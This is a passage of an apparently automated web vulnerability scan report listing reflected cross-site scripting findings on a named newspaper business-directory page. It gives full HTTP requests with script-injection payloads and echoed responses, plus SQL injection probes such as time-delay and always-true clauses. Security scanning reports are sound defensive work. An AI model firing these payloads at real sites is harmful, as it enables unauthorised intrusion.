25-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91598
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCRTTDT=JJDHDNGAGFEDEBIOPKELKFGD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="RegionId" value="b0ffd"><script>alert(1)</script>565d1c5bd36cff4ca">
...[SNIP]...

4.220. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RegionId request parameter is copied into the HTML document as plain text between tags. The payload 3108c<script>alert(1)</script>08b8a5d9b30 was submitted in the RegionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=33108c<script>alert(1)</script>08b8a5d9b30&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40ex
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=33108c<script>alert(1)</script>08b8a5d9b30&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40exa
...[SNIP]...

4.221. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RegionId request parameter is copied into the HTML document as plain text between tags. The payload 39108<script>alert(1)</script>f028f43b87f was submitted in the RegionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=339108<script>alert(1)</script>f028f43b87f&SubCatId=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 166
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=339108<script>alert(1)</script>f028f43b87f&SubCatId=3

4.222. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SOrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdc4"><script>alert(1)</script>bdaa9e474c456aa5c was submitted in the SOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A5cdc4"><script>alert(1)</script>bdaa9e474c456aa5c&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91516
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=PBNHKJGACBCEIPFPODMIFAPE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="SOrder" value="A5cdc4"><script>alert(1)</script>bdaa9e474c456aa5c">
...[SNIP]...

4.223. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SOrder request parameter is copied into the HTML document as plain text between tags. The payload 70868<script>alert(1)</script>b9a2e9b2bba was submitted in the SOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A70868<script>alert(1)</script>b9a2e9b2bba&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConn
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A70868<script>alert(1)</script>b9a2e9b2bba&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConne
...[SNIP]...

4.224. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SoL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SoL request parameter is copied into the HTML document as plain text between tags. The payload beaed<script>alert(1)</script>14aeaed9c3f was submitted in the SoL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3beaed<script>alert(1)</script>14aeaed9c3f&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3beaed<script>alert(1)</script>14aeaed9c3f&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.c
...[SNIP]...

4.225. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SoL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SoL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 993e6"><script>alert(1)</script>ebf5fb1369cea971 was submitted in the SoL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-